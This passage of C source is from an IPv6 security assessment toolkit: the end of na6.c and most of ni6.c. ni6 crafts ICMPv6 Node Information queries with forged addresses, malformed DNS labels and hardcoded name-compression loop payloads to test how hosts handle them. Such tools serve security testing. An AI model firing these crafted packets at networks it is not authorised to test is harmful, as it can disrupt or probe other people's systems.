IPv6 Destination Address is only used if a target IPv6 address or a target Ethernet * address were specified */ if(idata->dstaddr_f || idata->hdstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s%s\n", pdstaddr, \ ((!idata->dstaddr_f)?" (all-nodes link-local multicast)":"")); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (default)"); for(i=0; ifragh_f) printf("Sending each packet in fragments of %u bytes (plus the Unfragmentable part)\n", nfrags); if(!floodt_f){ if(targetaddr_f){ if(inet_ntop(AF_INET6, &targetaddr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting ND IPv6 Target Address to presentation format"); exit(EXIT_FAILURE); } printf("ND Target Address: %s\n", pv6addr); } } else{ if(inet_ntop(AF_INET6, &targetaddr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting ND IPv6 Target Address to presentation format"); exit(EXIT_FAILURE); } printf("ND Target Address: randomized, from the %s/%u prefix%s\n", pv6addr, targetpreflen,\ (!targetprefix_f)?" (default)":""); } printf("Flags: %s%s%s%s\n", ((router_f)?"R":""), ((solicited_f)?"S":""), ((override_f)?"O":""),\ ((!router_f && !solicited_f && !override_f)?"none":"")); for(i=0;i Address: %s\n", \ ((floods_f && !tllaopta_f)?"(randomized for each packet)":plinkaddr)); } } ipv6toolkit-2.0+ds.1/tools/na6.h000066400000000000000000000000541254360455000164060ustar00rootroot00000000000000/* * Header file for the na6 tool * */ ipv6toolkit-2.0+ds.1/tools/ni6.c000066400000000000000000002073641254360455000164260ustar00rootroot00000000000000/* * ni6: A security assessment tool that exploits potential flaws * in the processing of ICMPv6 Node Information messages * * Copyright (C) 2011-2015 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make ni6 * * It requires that the libpcap library be installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "ni6.h" #include "ipv6toolkit.h" #include "libipv6.h" /* Function prototypes */ void init_packet_data(struct iface_data *); int send_packet(struct iface_data *, const u_char *, struct pcap_pkthdr *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); int print_ni_data(struct iface_data *, const u_char *, struct pcap_pkthdr *); int print_ni_addr(struct iface_data *, const u_char *, struct pcap_pkthdr *); int print_ni_addr6(struct iface_data *, const u_char *, struct pcap_pkthdr *); int print_ni_name(struct iface_data *, const u_char *, struct pcap_pkthdr *); int print_ni_noop(struct iface_data *, const u_char *, struct pcap_pkthdr *); /* Variables used for learning the default router */ struct iface_data idata; struct ether_addr rs_ether; struct in6_addr rs_ipv6; struct in6_addr randprefix; unsigned char randpreflen; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct ip6_hdr *pkt_ipv6; struct in6_addr *pkt_ipv6addr; struct icmp6_nodeinfo *pkt_ni; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; char domain[MAX_DOMAIN_LEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; struct ip6_hdr *ipv6; struct icmp6_hdr *icmp6; struct icmp6_nodeinfo *ni; struct ether_header *ethernet; char *lasts, *rpref; char *charptr, *printname, *printnamed; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int nsleep; unsigned char srcpreflen; uint16_t mask; uint8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char iface_f=0; unsigned char rand_src_f=0, forgeether_f=0; unsigned char listen_f = 0, multicastdst_f=0, accepted_f=0, loop_f=0, sleep_f=0; unsigned char srcprefix_f=0, hoplimit_f=0, flags_f=0, exceedp_f=0, snamedslabel_f=0; unsigned char floods_f=0, name_f=0, fname_f=0, ipv6addr_f=0, ipv4addr_f=0, maxlabel_f=0; unsigned char named_f=0, fnamed_f=0, ipv6addrd_f=0, ipv4addrd_f=0, exceedpd_f=0; unsigned char payloadsize_f=0, qtype_f=0, code_f=0, snameslabel_f=0, sloopattack_f=0; unsigned char dloopattack_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; /* ICMPv6 NI */ struct in_addr ipv4addr, ipv4addrd; struct in6_addr ipv6addr, ipv6addrd; unsigned int maxlabel, slvariant, slsize, dlvariant, dlsize; char *name, *named; unsigned int fnamelen, exceedp, fnamedlen, exceedpd, payloadsize; int namelen, namedlen; uint8_t qtype, type; uint8_t code=0; uint16_t flags=0; unsigned char *slpointer, *dlpointer; struct filters filters; int main(int argc, char **argv){ extern char *optarg; int r, sel; fd_set sset, rset; time_t curtime, lastni=0, start=0; struct timeval timeout; struct target_ipv6 targetipv6; /* For queries only: loops to the beginning of the same label (shouldn't work) */ unsigned char dnsloopq0[]={0x04, 0x61, 0x61, 0x61, 0x61, 0x0c, 0x00}; /* For queries only: loops on a single byte label (shouldn't work) */ unsigned char dnsloopq1[]={0x04, 0x61, 0x61, 0x61, 0x61, 0x0c, 0x05}; /* Loops to the beginning of the same label */ unsigned char dnsloopr0[]={0x04, 0x61, 0x61, 0x61, 0x61, 0x0c, 0x04}; /* Loops on a single byte */ unsigned char dnsloopr1[]={0x04, 0x61, 0x61 , 0x61, 0x61, 0x0c, 0x09}; /* Loops to the beginning of a previous label */ unsigned char dnsloopr2[]={0x04, 0x61, 0x61, 0x61, 0x61, 0x00, 0x03, 0x61 , 0x61, 0x61, 0x0c, 0x04}; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-addr", required_argument, 0, 's'}, {"dst-addr", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'c'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"payload-size", required_argument, 0, 'P'}, {"subject-ipv4", required_argument, 0, '4'}, {"subject-ipv6", required_argument, 0, '6'}, {"subject-name", required_argument, 0, 'n'}, {"subject-fname", required_argument, 0, 'N'}, {"subject-ename", required_argument, 0, 'x'}, {"subject-nloop", required_argument, 0, 'o'}, {"max-label-size", required_argument, 0, 'Z'}, {"sname-slabel", no_argument, 0, 'e'}, {"code", required_argument, 0, 'C'}, {"qtype", required_argument, 0, 'q'}, {"flags", required_argument, 0, 'X'}, {"data-ipv6", required_argument, 0, 'w'}, {"data-ipv4", required_argument, 0, 'W'}, {"data-name", required_argument, 0, 'a'}, {"data-fname", required_argument, 0, 'A'}, {"data-ename", required_argument, 0, 'Q'}, {"data-nloop", required_argument, 0, 'O'}, {"dname-slabel", no_argument, 0, 'E'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"forge-src-addr", no_argument, 0, 'r'}, {"forge-link-src-addr", no_argument, 0, 'R'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:c:u:U:H:y:S:D:P:4:6:n:N:x:o:Z:eC:q:X:w:W:a:A:Q:O:Ej:k:J:K:b:g:B:G:lz:Lvh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } srandom(time(NULL)); hoplimit=64+random()%180; /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option){ case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ srcpreflen = atoi(charptr); if(srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), srcpreflen); srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = TRUE; type= ICMP6_NI_QUERY; break; case 'c': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; idata.fragh_f= 1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case '6': /* Subject: IPv6 address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } ipv6addr= targetipv6.ip6; ipv6addr_f = 1; break; case '4': /* Subject: IPv4 address */ if( inet_pton(AF_INET, optarg, &ipv4addr) <= 0){ puts("inet_pton(): Subject Address not valid"); exit(EXIT_FAILURE); } ipv4addr_f = 1; break; case 'n': /* Subject: Name */ printname= optarg; namelen= strlen(optarg) + 1; if( (name=malloc(namelen + 1)) == NULL){ puts("Error allocating memory"); exit(EXIT_FAILURE); } if( (namelen=dns_str2wire(optarg, namelen, name, namelen+1)) == -1){ puts("inet_pton(): Error while converting name to DNS wire format"); exit(EXIT_FAILURE); } name_f = 1; break; case 'N': /* Subject: Name of an arbitrary length */ fnamelen= atoi(optarg); fname_f= 1; break; case 'x': /* Subject: DNS wire label that exceeeds packet size */ exceedp= atoi(optarg); exceedp_f= 1; break; case 'o': slvariant=atoi(optarg); sloopattack_f=1; break; case 'P': /* Payload Size */ payloadsize= atoi(optarg); payloadsize_f= 1; break; case 'w': /* Data: IPv6 address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } ipv6addrd= targetipv6.ip6; ipv6addrd_f = 1; break; case 'W': /* Data: IPv4 address */ if( inet_pton(AF_INET, optarg, &ipv4addrd) <= 0){ puts("inet_pton(): Redirected Address not valid"); exit(EXIT_FAILURE); } ipv4addrd_f = 1; break; case 'a': /* Data: Name */ printnamed= optarg; namedlen= strlen(optarg) + 1; if( (named=malloc(namedlen + 1)) == NULL){ puts("Error allocating memory"); exit(EXIT_FAILURE); } if( (namedlen=dns_str2wire(optarg, namedlen, named, namedlen+1)) == -1){ puts("inet_pton(): Error while converting name to DNS wire format"); exit(EXIT_FAILURE); } named_f = 1; break; case 'A': /* Data: Name of an arbitrary length */ fnamedlen= atoi(optarg); fnamed_f= 1; break; case 'Q': /* Data: DNS wire label that exceeeds packet size */ exceedpd= atoi(optarg); exceedpd_f= 1; break; case 'O': dlvariant=atoi(optarg); dloopattack_f=1; break; case 'E': /* Data is a Single label name */ snamedslabel_f=1; break; case 'Z': /* Max DNS label size (defaults to 63) */ maxlabel= atoi(optarg); if(maxlabel < 1){ puts("Error: max-label-size too small"); exit(EXIT_FAILURE); } maxlabel_f= 1; break; case 'e': /* Subject is a Single label name */ snameslabel_f=1; break; case 'C': /* ICMPv6 code */ code= atoi(optarg); code_f= 1; break; case 'q': /* Qtype */ qtype= atoi(optarg); qtype_f= 1; break; case 'X': charptr = optarg; while(*charptr){ switch(*charptr){ case 'G': flags= flags | NI_NODEADDR_FLAG_GLOBAL; break; case 'S': flags= flags | NI_NODEADDR_FLAG_SITELOCAL; break; case 'L': flags= flags | NI_NODEADDR_FLAG_LINKLOCAL; break; case 'C': flags= flags | NI_NODEADDR_FLAG_COMPAT; break; case 'A': flags= flags | NI_NODEADDR_FLAG_ALL; break; case 'T': flags= flags | NI_NODEADDR_FLAG_TRUNCATE; break; case 'X': /* No flags */ break; default: printf("Unknown TCP flag '%c'\n", *charptr); exit(EXIT_FAILURE); break; } if(*charptr == 'X') break; charptr++; } flags_f=1; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); filters.nblockdst++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'r': rand_src_f=1; break; case 'R': forgeether_f=1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'v': /* Be verbose */ idata.verbose_f++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("ni6 needs root privileges to run."); exit(EXIT_FAILURE); } if(listen_f && !iface_f){ puts("Must specify the network interface with the -i option when 'listening' mode is set"); exit(EXIT_FAILURE); } if(listen_f && loop_f){ puts("'Error: 'listen' mode and 'loop' mode are incompatible"); exit(EXIT_FAILURE); } if(!(idata.dstaddr_f) && !listen_f){ /* Must specify IPv6 Destination Address if listening mode not used */ puts("IPv6 Destination Address not specified (and listening mode not selected)"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_SRC_NXT_HOP) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if(!sleep_f) nsleep=2; if(!maxlabel_f){ maxlabel=63; } if(!flags_f){ switch(qtype){ case NI_QTYPE_NODEADDR: flags= NI_NODEADDR_FLAG_GLOBAL | NI_NODEADDR_FLAG_SITELOCAL | NI_NODEADDR_FLAG_LINKLOCAL |\ NI_NODEADDR_FLAG_COMPAT | NI_NODEADDR_FLAG_ALL; break; default: flags= 0; break; } } if( !idata.fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(sloopattack_f){ if(code_f && code != 1){ puts("Error: NI code must be '1' for performing name-loop attacks"); exit(EXIT_FAILURE); } else{ code=1; } } if(sloopattack_f){ switch(slvariant){ case 0: slpointer= (unsigned char *)dnsloopq0; slsize= sizeof(dnsloopq0); break; case 1: slpointer= (unsigned char *)dnsloopq1; slsize= sizeof(dnsloopq1); break; default: puts("Error: invalid name loop variant (valid values are 0-1)"); exit(EXIT_FAILURE); break; } } if(dloopattack_f){ switch(dlvariant){ case 0: dlpointer= (unsigned char *)dnsloopr0; dlsize= sizeof(dnsloopr0); break; case 1: dlpointer= (unsigned char *)dnsloopr1; dlsize= sizeof(dnsloopr1); break; case 2: dlpointer= (unsigned char *)dnsloopr2; dlsize= sizeof(dnsloopr2); break; default: puts("Error: invalid name loop variant (valid values are 0-2)"); exit(EXIT_FAILURE); break; } } /* Set initial contents of the attack packet */ init_packet_data(&idata); FD_ZERO(&sset); FD_SET(idata.fd, &sset); start= time(NULL); /* Fire an ICMPv6 Redirect if an IPv6 Destination Address was specified */ if(idata.dstaddr_f){ if(!code_f){ if(ipv6addr_f){ code=0; } else if(name_f || fname_f || exceedp_f || sloopattack_f){ code=1; } else if(ipv4addr_f){ code=2; } else{ code=0; } } if(!qtype_f){ switch(code){ case 0: qtype= NI_QTYPE_NODEADDR; break; case 1: qtype= NI_QTYPE_NODEADDR; break; case 2: qtype= NI_QTYPE_NODEADDR; break; default: qtype= NI_QTYPE_NOOP; break; } } if(pcap_compile(idata.pfd, &pcap_filter, PCAP_ICMPV6_NI_REPLY, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); type= ICMP6_NI_QUERY; if(idata.verbose_f){ print_attack_info(&idata); } while(1){ curtime=time(NULL); if(!loop_f && (curtime - start) >= QUERY_TIMEOUT){ break; } if((curtime - lastni) >= nsleep){ lastni=curtime; puts("Sending ICMPv6 Node Information Query....\n"); if(send_packet(&idata, NULL, NULL) == -1){ puts("Error sending packet"); exit(EXIT_FAILURE); } } rset= sset; #if defined(sun) || defined(__sun) || defined(__linux__) timeout.tv_usec=10000; timeout.tv_sec= 0; #else timeout.tv_usec=0; timeout.tv_sec= nsleep; #endif if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } /* Read a NI Reply packet */ #if defined(sun) || defined(__sun) || defined(__linux__) if(TRUE){ #else if(sel && FD_ISSET(idata.fd, &rset)){ #endif if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 1 && pktdata != NULL){ if(print_ni_data(&idata, pktdata, pkthdr) == -1){ puts("Error while printing NI data"); exit(EXIT_FAILURE); } } } } 